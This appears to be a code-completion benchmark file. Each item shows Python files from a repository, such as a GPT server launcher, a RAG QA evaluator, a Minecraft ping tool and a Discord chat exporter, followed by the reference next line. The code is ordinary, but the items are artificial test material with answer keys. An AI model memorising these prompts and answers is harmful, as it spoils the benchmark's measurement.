""" def _app_path(app: FastAPI) -> str: app_str = var_name(app, globals()) return f"{__name__}:{app_str}" configure(app, AppMain, options=options) app_path = _app_path(app) @app.on_event('startup') async def fastapi_startup(): if disable_server_logs: disable_noisy_logs()
log.info("Uvicorn running on http://%s:%s (Press CTRL+C to quit)", host, port)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: ict-bigdatalab/RIGHT # Path: get_datasets.py def read_line_examples_from_file(data_path): sequence = [] with open(data_path, 'r', encoding='utf-8') as f: for line in f: line = line.strip("\n") if not line: continue sequence.append(line.strip()) return sequence # Path: eval_utils.py def f1(pre, rec): if pre == 0 and rec == 0: return 0.0 return 2 * pre * rec / (pre + rec) # Path: retrieval_analysis.py import json from get_datasets import read_line_examples_from_file from tqdm import tqdm from eval_utils import f1 def get_hashtag_list(dst): tags = dst.split('[SEP]') target = [] for j in range(len(tags)): tags[j] = tags[j].strip() if tags[j] != '': target.append(tags[j]) # if the dst is nothing if len(target) == 0: target.append('None') # statistic_hashtags(hashtags) return target def retrieval_analysis(src_path, label_path, rev_index_path, document_path, out_path): src_list = read_line_examples_from_file(src_path) dst_list = read_line_examples_from_file(label_path) document_list = read_line_examples_from_file(document_path) with open(rev_index_path, 'r', encoding='UTF-8') as fp: rev_index = json.load(fp) rev_dst = [[document_list[index] for index in rev_index[i]["index"]] for i in range(len(src_list))] with open(out_path, 'w', encoding='UTF-8') as fp: for i in tqdm(range(len(src_list))): line = str(i) + '\n' + src_list[i] + '\n' + dst_list[i] + '\n' for k in range(len(rev_dst[i])): line = line + str(rev_index[i]['score'][k]) + '\t' + rev_dst[i][k] + '\n' line += '\n' fp.write(line) def retrieval_hashtag_score_analysis(src_path, label_path, rev_index_path, document_path, top_k): src_list = read_line_examples_from_file(src_path) dst_list = read_line_examples_from_file(label_path) document_list = read_line_examples_from_file(document_path) with open(rev_index_path, 'r', encoding='UTF-8') as fp: rev_index = json.load(fp) rev_dst = [[get_hashtag_list(document_list[index]) for index in rev_index[i]["index"]] for i in range(len(src_list))] dst_list = [get_hashtag_list(dst) for dst in dst_list] total_p = 0 total_r = 0 true_num = 0 for i in tqdm(range(len(src_list))): label = dst_list[i] hashtag_score = dict() for k in range(len(rev_dst[i])): for rev_hashtag in rev_dst[i][k]: if rev_hashtag not in hashtag_score.keys(): hashtag_score[rev_hashtag] = 0 hashtag_score[rev_hashtag] += rev_index[i]['score'][k] hashtag_score = sorted(hashtag_score.items(), key=lambda x: x[1], reverse=True)[:top_k] total_p += len(hashtag_score) total_r += len(label) for rev_hashtag_pair in hashtag_score: for lab in label: if rev_hashtag_pair[0] == lab or rev_hashtag_pair[0] in lab or lab in rev_hashtag_pair[0]: true_num += 1 p = true_num / total_p r = true_num / total_r
f = f1(p, r)
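The reference completion folds the micro-averaged precision and recall into an F1 score. The zero guard in f1 matters because both counts can legitimately be zero; a self-contained check with toy counts:

```
def f1(pre, rec):
    # harmonic mean, guarded against the all-zero case
    if pre == 0 and rec == 0:
        return 0.0
    return 2 * pre * rec / (pre + rec)

true_num, total_p, total_r = 30, 50, 60   # toy counts
p = true_num / total_p                    # precision over predicted hashtags
r = true_num / total_r                    # recall over gold hashtags
print(p, r, f1(p, r))                     # 0.6 0.5 0.5454...
```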
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: shell-nlp/gpt_server # Path: gpt_server/utils.py def get_free_tcp_port(): """获取可用的端口""" tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) tcp.bind(("", 0)) _, port = tcp.getsockname() tcp.close() return port # Path: gpt_server/utils.py def start_server(host, port): """启动服务""" start_controller() start_openai_server(host, port) # Path: gpt_server/utils.py def run_cmd(cmd): print("执行命令命令如下:") print(cmd) # 执行 subprocess.run(cmd, shell=True) # Path: gpt_server/utils.py def stop_server(): """停止服务""" stop_fastchat = ( "ps -ef | grep fastchat.serve | awk '{print $2}' |xargs -I{} kill -9 {}" ) stop_gpt_server = ( "ps -ef | grep gpt_server | awk '{print $2}' |xargs -I{} kill -9 {}" ) run_cmd(stop_fastchat) run_cmd(stop_gpt_server) print("停止服务成功!") # Path: gpt_server/utils.py def delete_log(root_path): datanames = os.listdir(os.path.join(root_path, "serving")) # 查找本目录下所有文件 for dataname in datanames: if ( dataname.startswith("model_worker") or dataname.startswith("openai_api_server") or dataname.startswith("controller.log") ): # print(os.path.join(root_path,f"serving/{dataname}")) os.remove(os.path.join(root_path, f"serving/{dataname}")) # Path: gpt_server/serving/main.py import yaml import os import sys import subprocess import signal from pprint import pprint from multiprocessing import Process from gpt_server.utils import get_free_tcp_port, start_server, run_cmd, stop_server,delete_log # 配置根目录 root_dir = os.path.join(os.path.dirname(__file__), "..") root_dir = os.path.abspath(root_dir) sys.path.append(root_dir) # 删除日志 delete_log(root_dir) def signal_handler(signum, frame): stop_server() raise KeyboardInterrupt signal.signal(signal.SIGINT, signal_handler) with open("./config.yaml", "r") as f: config = yaml.safe_load(f) print(config) # ----------------------------启动 Controller 和 Openai API 服务---------------------------------------------------- host = config["serve_args"]["host"] port = config["serve_args"]["port"] start_server(host, port) # ----------------------------启动 Controller 和 Openai API 服务---------------------------------------------------- for model_name, model_config in config["models"].items(): # 启用的模型 if model_config["enable"]: pprint(model_config) print() # 模型地址 model_name_or_path = model_config["model_name_or_path"] # 模型类型 model_type = model_config["model_type"] # model type 校验 py_path = f"{root_dir}/model_worker/{model_type}.py" model_names = model_name if model_config["alias"]: model_names = model_name + "," + model_config["alias"] # 获取 worker 数目 并获取每个 worker 的资源 workers = model_config["workers"] # if model_config["work_mode"] == "deepspeed": # 设置使用 deepspeed process = [] for worker in workers: gpus = worker["gpus"] # 将gpus int ---> str gpus = [str(i) for i in gpus] gpus_str = ",".join(gpus) num_gpus = len(gpus) if model_config["work_mode"] == "deepspeed": os.environ["USE_DS"] = "1" run_mode = f"deepspeed --num_gpus {num_gpus} " pass elif model_config["work_mode"] == "accelerate": os.environ["USE_ACC"] = "1" os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str run_mode = "python " pass elif model_config["work_mode"] == "hf": os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str run_mode = "python " pass # DS 只能在代码内部起效 # os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str cmd = ( run_mode + py_path + f" --gpus {gpus_str}"
+ f" --master_port {get_free_tcp_port()}"
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: LLM-Evaluation-s-Always-Fatiguing/leaf-playground-hub # Path: rag_qa/rag_qa/agents/examiner.py class Examiner(SceneStaticAgent, role_definition=ROLE_DEFINITION, cls_description="An agent who minitor the examine"): config_cls = ExaminerConfig config: config_cls def __init__(self, config: config_cls): super().__init__(config=config) self._cur = 0 self._questions = [] self._dataset_config: DatasetConfig = None def prepare_questions( self, dataset_config: DatasetConfig, ) -> None: self._cur = 0 self._questions = prepare_dataset(dataset_config) self._dataset_config = dataset_config def send_question(self, receivers: List[Profile]) -> ExaminerQuestion: question = ExaminerQuestion( sender=self.profile, receivers=receivers, content=Text(text=self._questions[self._cur][self._dataset_config.question_column]), question_id=self._cur ) self._cur += 1 return question def check_examine_finish(self) -> bool: return self._cur >= len(self._questions) def get_golden_answer(self, question_id: int) -> Optional[dict]: result = {} if self._dataset_config.golden_answer_column: result['golden_answer'] = self._questions[question_id][self._dataset_config.golden_answer_column] if self._dataset_config.ground_truth_column: result['ground_truths'] = self._questions[question_id][self._dataset_config.ground_truth_column] return result # Path: rag_qa/rag_qa/agents/base_examinee.py class AIBaseExaminee(SceneAIAgent, ABC, role_definition=ROLE_DEFINITION): config_cls = AIBaseExamineeConfig config: config_cls @abstractmethod async def answer_question(self, question: ExaminerQuestion, examiner: Profile) -> ExamineeAnswer: pass # Path: rag_qa/rag_qa/dataset_utils.py class DatasetConfig(_Config): path: str = Field(default="explodinggradients/fiqa") split: str = Field(default="baseline") question_column: str = Field(default="question") golden_answer_column: str = Field(default="answer") ground_truth_column: str = Field(default="ground_truths") num_questions: int = Field(default=-1) filter_conditions: Optional[List[DynamicFn]] = Field(default=None) question_preprocessor: Optional[DynamicFn] = Field(default=None) name: Optional[str] = Field(default=None) data_dir: Optional[str] = Field(default=None) data_files: Optional[List[str]] = Field(default=None) def model_post_init(self, __context: Any) -> None: if self.num_questions < -1 or self.num_questions == 0: raise ValueError(f"num_questions should be -1 or positive, got {self.num_questions}") # Path: rag_qa/rag_qa/scene_definition.py def avg_fn(records: List[_RecordData]) -> AggregationMethodOutput: class ExaminerQuestion(TextMessage): class ExamineeAnswer(JsonMessage): SCENE_DEFINITION = SceneDefinition( name="RAG QA Examine", description="Retrieval Augmented Generation Question Answering Examine Scene. The evaluator powered by ragas.", roles=[ RoleDefinition( name="examiner", description="the one that participants in a rag based qa examine to monitor the examinees", num_agents_range=(1, 1), is_static=True, actions=[] ), RoleDefinition( name="examinee", description="the one that participants in a rag based qa examine to answer questions", num_agents_range=(1, -1), is_static=False, actions=[ ActionDefinition( name="answer_question", description="answering the question sent by examiner", signature=ActionSignatureDefinition( parameters=[ ActionSignatureParameterDefinition( name="question", annotation=ExaminerQuestion ), ActionSignatureParameterDefinition( name="examiner", annotation=Profile ) ], return_annotation=ExamineeAnswer, is_static_method=False ), metrics=MetricDefinitionList, ) ] ) ], env_vars=[] ) # Path: rag_qa/rag_qa/scene.py import asyncio from typing import List, Optional from pydantic import Field from leaf_playground.core.workers import Logger from leaf_playground.core.scene import Scene from leaf_playground.core.scene_definition import SceneConfig from leaf_playground.data.log_body import ActionLogBody from leaf_playground.data.media import Text, Json from .agents.examiner import Examiner from .agents.base_examinee import AIBaseExaminee from .dataset_utils import DatasetConfig from .scene_definition import ExamineeAnswer, ExaminerQuestion, MessageType, SCENE_DEFINITION class RagSceneLogBody(ActionLogBody): references: Optional[List[MessageType]] = Field(default=None) response: MessageType = Field(default=...) ground_truth: Optional[Json] = Field(default=None) RagSceneConfig = SceneConfig.create_config_model( SCENE_DEFINITION, additional_config_fields={"dataset_config": (DatasetConfig, Field(default=...))} ) class RagScene(Scene, scene_definition=SCENE_DEFINITION, log_body_class=RagSceneLogBody): config_cls = RagSceneConfig config: config_cls def __init__(self, config: config_cls, logger: Logger): super().__init__(config=config, logger=logger) self.examiner: Examiner = self.static_agents["examiner"][0] self.examinees: List[AIBaseExaminee] = self.agents["examinee"] async def _run(self): async def examinee_answer(examinee: AIBaseExaminee, q: ExaminerQuestion) -> None: try:
answer: ExamineeAnswer = await examinee.answer_question(question=q, examiner=self.examiner.profile)
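The reference completion awaits a single examinee inside a per-examinee coroutine; the scene presumably fans these out concurrently. A minimal asyncio sketch of that fan-out, with a sleep standing in for the model call:

```
import asyncio

async def answer_question(examinee, question):
    await asyncio.sleep(0.01)              # stand-in for the model call
    return f"{examinee} answers {question}"

async def run_round(examinees, question):
    tasks = [answer_question(e, question) for e in examinees]
    return await asyncio.gather(*tasks)    # collect every answer concurrently

print(asyncio.run(run_round(["examinee_a", "examinee_b"], "q0")))
```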
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: djkcyl/ABot-NT # Path: utils/message/picture.py class SelfPicture: def __init__(self) -> None: self.s3file = Launart.current().get_component(S3FileService).s3file async def from_name(self, name: str) -> Picture: url = await self.s3file.get_presigned_url(name) return Picture(UrlResource(url)) async def from_data(self, data: bytes | BytesIO, image_format: str | None = None) -> Picture: # 如果没有指定格式, 那么就尝试从 data 中获取 if not image_format: if isinstance(data, BytesIO): image = Image.open(data) data.seek(0) else: image = Image.open(BytesIO(data)) if image.format: image_format = image.format.lower() else: msg = "无法获取图片格式" raise ValueError(msg) # 防止后续操作 data 时出现问题, 先将 data 转换为 bytes if isinstance(data, BytesIO): data = data.getvalue() name = f"{token_hex(32)}.{image_format}" # 根据场景选择上传方式 ctx = Context.current if ctx.scene.path_without_land == "group": await self.s3file.put_object(name, data, f"image/{image_format}", "temp_image") return await self.from_name(name) if ctx.scene.path_without_land in {"guild.channel", "guild.user"}: return Picture(RawResource(data)) msg = "不支持的平台" raise NotImplementedError(msg) # Path: func/tool/mcping/statusping.py class StatusPing: def __init__(self, host: str = "localhost", port: int = 25565, timeout: int = 5): self._host = host self._port = port self._timeout = timeout @staticmethod def _unpack_varint(sock: socket.socket) -> int: data = 0 for i in range(5): ordinal = sock.recv(1) if len(ordinal) == 0: break byte = ord(ordinal) data |= (byte & 0x7F) << 7 * i if not byte & 0x80: break return data @staticmethod def _pack_varint(data: int) -> bytes: ordinal = b"" while True: byte = data & 0x7F data >>= 7 ordinal += struct.pack("B", byte | (0x80 if data > 0 else 0)) if data == 0: break return ordinal def _pack_data(self, data: str | int | float | bytes) -> bytes: # noqa: PYI041 if isinstance(data, str): data = data.encode("utf8") return self._pack_varint(len(data)) + data if isinstance(data, int): return struct.pack("H", data) if isinstance(data, float): return struct.pack("Q", int(data)) return data def _send_data(self, connection: socket.socket, *args: str | int | float | bytes) -> None: # noqa: PYI041 data = b"" for arg in args: data += self._pack_data(arg) connection.send(self._pack_varint(len(data)) + data) def _read_fully(self, connection: socket.socket, *, extra_varint: bool = False) -> bytes: packet_length = self._unpack_varint(connection) packet_id = self._unpack_varint(connection) byte = b"" if extra_varint: if packet_id > packet_length: self._unpack_varint(connection) extra_length = self._unpack_varint(connection) while len(byte) < extra_length: byte += connection.recv(extra_length) else: byte = connection.recv(packet_length) return byte def get_status(self) -> dict: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as connection: connection.settimeout(self._timeout) connection.connect((self._host, self._port)) self._send_data(connection, b"\x00\x00", self._host, self._port, b"\x01") self._send_data(connection, b"\x00") data = self._read_fully(connection, extra_varint=True) self._send_data(connection, b"\x01", time.time() * 1000) unix = self._read_fully(connection) response: dict = json.loads(data.decode("utf8")) response["ping"] = int(time.time() * 1000) - struct.unpack("Q", unix)[0] return response # Path: func/tool/mcping/mcping.py import asyncio import base64 import contextlib import json import re import dns.resolver from io import BytesIO from avilla.core import Picture from loguru import logger from PIL import Image from utils.message.picture import SelfPicture from .statusping import StatusPing def ping_status(host: str, port: int | None = None) -> dict: if port is None: with contextlib.suppress(Exception): srv_records = dns.resolver.query(f"_minecraft._tcp.{host}", "SRV") for srv in srv_records: host = str(srv.target).rstrip(".") port = srv.port break status_ping = StatusPing(host, port or 25565) status = status_ping.get_status() status_str = json.dumps(status) status_str = re.sub(r"\\u00a7.", "", status_str) status: dict = json.loads(status_str) logger.debug(status) return status def get_server_status(say: str) -> dict: host, _, port = say.partition(":") return ping_status(host, int(port) if port else None) async def handle_favicon(status: dict, messages: list[str | Picture]) -> None: if favicon := status.get("favicon"): byte_data = base64.b64decode(f"{favicon[22:-1]}=") img = Image.open(BytesIO(byte_data)).convert("RGB") image = BytesIO() img.save(image, format="JPEG", quality=90)
messages.append(await SelfPicture().from_data(image, "jpeg"))
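The reference completion hands the re-encoded JPEG to the upload helper. The favicon arrives as a base64 data URI; a self-contained sketch of the decode and re-encode step (splitting on the comma is an assumption equivalent to the slice used in the prompt):

```
import base64
from io import BytesIO
from PIL import Image

def favicon_to_jpeg(favicon: str) -> BytesIO:
    b64 = favicon.split(",", 1)[1]            # drop the "data:image/png;base64," prefix
    b64 += "=" * (-len(b64) % 4)              # repad, like the "=" appended in the prompt
    img = Image.open(BytesIO(base64.b64decode(b64))).convert("RGB")
    out = BytesIO()
    img.save(out, format="JPEG", quality=90)  # same re-encode as the handler
    out.seek(0)
    return out
```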
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Chenyme/Chenyme-AAMT # Path: utils/utils.py def generate_srt_from_result(result): # 格式化为SRT字幕的形式 segments = result['segments'] srt_content = '' segment_id = 1 for segment in segments: start_time = int(segment['start'] * 1000) end_time = int(segment['end'] * 1000) text = segment['text'] srt_content += f"{segment_id}\n" srt_content += f"{milliseconds_to_srt_time_format(start_time)} --> {milliseconds_to_srt_time_format(end_time)}\n" srt_content += f"{text}\n\n" segment_id += 1 return srt_content # Path: utils/utils.py def tmp_filepath(uploaded_file): # 虚拟化文件路径 with tempfile.NamedTemporaryFile(delete=False) as tmp_file: tmp_file.write(uploaded_file.getvalue()) return tmp_file.name # Path: utils/utils.py def openai_translate(key, base, result): llm = ChatOpenAI(openai_api_key=key, openai_api_base=base) # Prompt prompt = ChatPromptTemplate( messages=[ SystemMessagePromptTemplate.from_template( "You are a senior translator proficient in Chinese and English. Your task is to translate whatever the user says. You only need to answer the translation result and do not use punctuation marks other than question marks. Please strictly implement it!" ), # The `variable_name` here is what must align with memory MessagesPlaceholder(variable_name="chat_history"), HumanMessagePromptTemplate.from_template("{question}"), ] ) # 设置记忆参数 memory = ConversationBufferWindowMemory(memory_key="chat_history", return_messages=True, k=5) conversation = LLMChain(llm=llm, prompt=prompt, verbose=False, memory=memory) segments = result['segments'] segment_id = 0 for segment in segments: text = segment['text'] response = conversation({"question": text}) result['segments'][segment_id]['text'] = response['text'] segment_id += 1 return result # Path: utils/utils.py def srt_mv(cache_dir): command = ' ffmpeg -i "' + "uploaded.mp4" + '" -lavfi ' + '"subtitles=' + 'output.srt' + ':force_style=' + "'BorderStyle=0,Outline=1,Shadow=0,Fontsize=18'" + '"' + ' -y -crf 1 -c:a copy "' + "output.mp4" + '"' subprocess.run(command, shell=True, cwd=cache_dir) # Path: utils/utils.py def cache(cache_dir): total_size = 0 # 总大小,初始为0 for root, dirs, files in os.walk(cache_dir): # 遍历文件夹中的所有文件和子文件夹 for file_name in files: file_path = os.path.join(root, file_name) total_size += os.path.getsize(file_path) return total_size # Path: utils/utils.py def convert_size(size): if size == 0: return "0B" size_names = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB") i = int(math.floor(math.log(size, 1024))) power = math.pow(1024, i) size = round(size / power, 2) return f"{size} {size_names[i]}" # Path: AAMT.py import os import json import streamlit as st import whisper from utils.utils import generate_srt_from_result, tmp_filepath, openai_translate, srt_mv, cache, convert_size # 作者:chenyme # 版本:v0.2.2 # 博客站:待更新 st.set_page_config( page_title="AAMT v0.2.2", page_icon="📊", layout="wide", # 设置布局样式为宽展示 initial_sidebar_state="expanded" # 设置初始边栏状态为展开 ) st.title("Chenyme-AAMT") st.write("##### AI全自动视频翻译") with st.sidebar: st.title("欢迎!") st.write(''' ### 尊敬的用户,恭喜你完成了该项目的安装! 欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。 请注意以下事项: 1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。 2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。 3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。 ''') dir_1 = os.path.dirname(os.path.abspath(__file__)) dir_2 = dir_1.replace("\\", "/") config_dir = dir_2 + "/config/" cache_dir = dir_2 + "/cache/" print("当前项目的配置文件:", config_dir) print("当前项目的缓存位置:", cache_dir) with open(config_dir + "config.json", 'r') as file: # 读取配置 config = json.load(file) tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"]) with tab1: # 文件上传逻辑 uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov']) if uploaded_file is not None: with open(cache_dir + "uploaded.mp4", "wb") as file: file.write(uploaded_file.getbuffer()) st.success("上传成功") if st.button('运行程序'): if uploaded_file is not None: with st.spinner('Wait for it...'): # whisper识别 model = whisper.load_model(st.session_state.option) pathvideo = tmp_filepath(uploaded_file) result = model.transcribe(pathvideo) print("whisper识别:" + result['text']) # whisper源语言识别内容
result = openai_translate(st.session_state.key, st.session_state.base, result) # 翻译成目标语言
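The reference completion pipes the whisper result through the LangChain translator before SRT generation. A reduced sketch of that hand-off; the model size, the file path, and the uppercasing step are placeholders for the real choices and the openai_translate call:

```
import whisper

model = whisper.load_model("base")             # placeholder model size
result = model.transcribe("uploaded.mp4")      # returns {"text": ..., "segments": [...]}
for segment in result["segments"]:
    segment["text"] = segment["text"].upper()  # stand-in for the LLM translation step
print(result["segments"][0]["text"])
```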
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: davidrs/logo-buddy # Path: logo_buddy/controlnet.py def preprocess(image, controlnet_path=None): if "canny" in controlnet_path: return canny_preprocess(image) else: return Image.fromarray(image) # Path: logo_buddy/controlnet.py CN_MODELS = { "qr": "/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/controlnetQRPatternQR_v2Sd15.safetensors", "canny": "/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/control_canny-fp16.safetensors", "depth": "/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/control_depth-fp16.safetensors", } # Path: logo_buddy/utils.py def read_fit(img_path, max_width=768): image = cv2.imread(img_path) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # resize image to X width, keep ratio h, w, _ = image.shape new_w = max_width new_h = int(h * (new_w / w)) image = cv2.resize(image, (new_w, new_h)) return image # Path: logo_buddy/main.py import os import os.path as op import numpy as np import torch import cv2 import torch from glob import glob from diffusers import StableDiffusionPipeline, DiffusionPipeline from diffusers import ( StableDiffusionControlNetPipeline, ControlNetModel, UniPCMultistepScheduler, ) from diffusers.utils import load_image from PIL import Image from .controlnet import preprocess, CN_MODELS from .utils import read_fit STEPS = 34 SEED = 12 MODELS = { "real": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/realisticVisionV51_v51VAE.safetensors", "anim": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/revAnimated_v122EOL.safetensors", } # PROMPT_LIST = [ # Winter {"text": "santa playing in the snow, ethereal, dreamy, highly detailed, realistic lighting, sharp focus, rule of thirds, artgerm, wlop, arney freytag, hd, octane, 4 k, ", "file_name": "winter_santa", "model":"anim"}, # <lora:fantasy00d:0.5>, animated { "text": "ethereal fantasy concept art of dreamscape Winter wonderland, surreal, ethereal, dreamy, mysterious, fantasy, highly detailed, magnificent, celestial, ethereal, painterly, epic, majestic, magical, fantasy art, cover art, dreamy", "file_name": "winter_wonderland", "model": "anim", }, {"text": "((ginger bread house)), realistic, insanely detailed, octane rendered, unreal engine, illustration, trending on artstation, masterpiece, photography", "file_name": "winter_ginger", "model":"real"}, {"text": "winter ice sculpture ", "file_name": "winter_ice"}, # General {"text": "a neon glowing sign", "file_name": "neon"}, {"text": "hot air balloons ", "file_name": "hot_air_balloons", "model":"real"}, {"text": "(wood carving), (inlay), (etsy) ", "file_name": "wood_carving", "model":"real"}, { "text": "paper cut, paper layers, laser cut, paper art, vibrant colors, ", "file_name": "paper_art", "model": "real", }, # {"text": "carved halloween pumpkin, witches, spooky, fun, (vibrant colors:1.1), ", "file_name": "haloween", "model":"anim"}, # <lora:fantasy00d:0.5>, animated { "text": "fun textures and colours , logo, pixar, orange and pink clouds blue sky, sun, happy vibes, subtle lense flare, birds ", "file_name": "clouds", "model": "anim", }, ] DEFAULT_POSITIVE_SUFFIX = ( ",detailed, intricate, best quality, (highest quality, award winning:1.3)" ) DEFAULT_NEGATIVE_PROMPT = ( "blurry, low quality, low resolution, low res, low resolution, watermark, logo" ) OUT_DIR = "./out" os.makedirs(OUT_DIR, exist_ok=True) # env is mac, cpu or gpu DEVICE = "mps" if torch.cuda.is_available(): DEVICE = "gpu" def get_pipe(model_path, controlnet_path=None): controlnet_model = None if controlnet_path: # load control net and stable diffusion v1-5 controlnet_model = ControlNetModel.from_single_file( controlnet_path, torch_dtype=torch.float16, use_safetensors=True, device=DEVICE, ) pipe = StableDiffusionControlNetPipeline.from_single_file( model_path, use_safetensors=True, torch_dtype=torch.float16, controlnet=controlnet_model, ) pipe = pipe.to(DEVICE) # Recommended if your computer has < 64 GB of RAM pipe.enable_attention_slicing() return pipe def controlnet_generate(img_path, pipe, out_dir, prompts=PROMPT_LIST, controlnet=None): image = read_fit(img_path) preprocessed_image = None if controlnet: preprocessed_image = preprocess(image, controlnet_path=controlnet) for p in prompts: generator = torch.manual_seed(SEED) for i in range(0, 1): print(DEFAULT_POSITIVE_SUFFIX) print(p["text"]) steps = STEPS image = pipe( p["text"] + DEFAULT_POSITIVE_SUFFIX, negative_prompt=DEFAULT_NEGATIVE_PROMPT, num_inference_steps=steps, generator=generator, image=preprocessed_image, # guidance_scale=20 if 'qr' in controlnet else 15, # controlnet_conditioning_scale=2.0 if 'qr' in controlnet else 1.0, # strength=0.85, ).images[0] image.save(op.join(out_dir, f"{p['file_name']}_{controlnet}_{SEED}.png")) # if main if __name__ == "__main__": for m, mp in MODELS.items():
for cn, cn_path in CN_MODELS.items():
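The reference completion opens the inner sweep, every base checkpoint crossed with every ControlNet. A dry-run sketch of the same nested iteration (paths are illustrative and the heavy get_pipe call is left commented out):

```
MODELS = {"real": "real.safetensors", "anim": "anim.safetensors"}
CN_MODELS = {"qr": "qr.safetensors", "canny": "canny.safetensors"}

for m, mp in MODELS.items():
    for cn, cn_path in CN_MODELS.items():
        print(f"model={m} ({mp}) x controlnet={cn} ({cn_path})")
        # pipe = get_pipe(mp, controlnet_path=cn_path)  # heavy GPU work, omitted here
```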
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Varexa/Gateway # Path: chat_exporter/ext/discord_import.py # Path: chat_exporter/ext/html_generator.py PARSE_MODE_NONE = 0 PARSE_MODE_NO_MARKDOWN = 1 PARSE_MODE_MARKDOWN = 2 PARSE_MODE_EMBED = 3 PARSE_MODE_SPECIAL_EMBED = 4 PARSE_MODE_REFERENCE = 5 PARSE_MODE_EMOJI = 6 async def fill_out(guild, base, replacements): def read_file(filename): # Path: chat_exporter/construct/assets/embed.py import html from chat_exporter.ext.discord_import import discord from chat_exporter.ext.html_generator import ( fill_out, embed_body, embed_title, embed_description, embed_field, embed_field_inline, embed_footer, embed_footer_icon, embed_image, embed_thumbnail, embed_author, embed_author_icon, PARSE_MODE_NONE, PARSE_MODE_EMBED, PARSE_MODE_MARKDOWN, PARSE_MODE_SPECIAL_EMBED, ) modules_which_use_none = ["nextcord", "disnake"] def _gather_checker(): if discord.module not in modules_which_use_none and hasattr(discord.Embed, "Empty"): return discord.Embed.Empty return None class Embed: r: str g: str b: str title: str description: str author: str image: str thumbnail: str footer: str fields: str check_against = None def __init__(self, embed, guild): self.embed: discord.Embed = embed self.guild: discord.Guild = guild async def flow(self): self.check_against = _gather_checker() self.build_colour() await self.build_title() await self.build_description() await self.build_fields() await self.build_author() await self.build_image() await self.build_thumbnail() await self.build_footer() await self.build_embed() return self.embed def build_colour(self): self.r, self.g, self.b = ( (self.embed.colour.r, self.embed.colour.g, self.embed.colour.b) if self.embed.colour != self.check_against else (0x20, 0x22, 0x25) # default colour ) async def build_title(self): self.title = html.escape(self.embed.title) if self.embed.title != self.check_against else "" if self.title: self.title = await fill_out(self.guild, embed_title, [ ("EMBED_TITLE", self.title, PARSE_MODE_MARKDOWN) ]) async def build_description(self): self.description = html.escape(self.embed.description) if self.embed.description != self.check_against else "" if self.description: self.description = await fill_out(self.guild, embed_description, [ ("EMBED_DESC", self.embed.description, PARSE_MODE_EMBED) ]) async def build_fields(self): self.fields = "" # This does not have to be here, but Pycord. if not self.embed.fields: return for field in self.embed.fields: field.name = html.escape(field.name) field.value = html.escape(field.value) if field.inline: self.fields += await fill_out(self.guild, embed_field_inline, [ ("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED), ("FIELD_VALUE", field.value, PARSE_MODE_EMBED) ]) else: self.fields += await fill_out(self.guild, embed_field, [ ("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED), ("FIELD_VALUE", field.value, PARSE_MODE_EMBED)]) async def build_author(self): self.author = html.escape(self.embed.author.name) if self.embed.author.name != self.check_against else "" self.author = f'<a class="chatlog__embed-author-name-link" href="{self.embed.author.url}">{self.author}</a>' \ if self.embed.author.url != self.check_against \ else self.author
author_icon = await fill_out(self.guild, embed_author_icon, [
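The reference completion starts rendering the author's icon; just above it the author name is HTML-escaped and wrapped in an anchor only when a URL exists. A dependency-free sketch of that escape-then-link decision:

```
import html

def author_fragment(name: str, url: str | None = None) -> str:
    safe = html.escape(name) if name else ""
    if safe and url:
        return f'<a class="chatlog__embed-author-name-link" href="{url}">{safe}</a>'
    return safe

print(author_fragment("R&D Bot", "https://example.com"))
```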
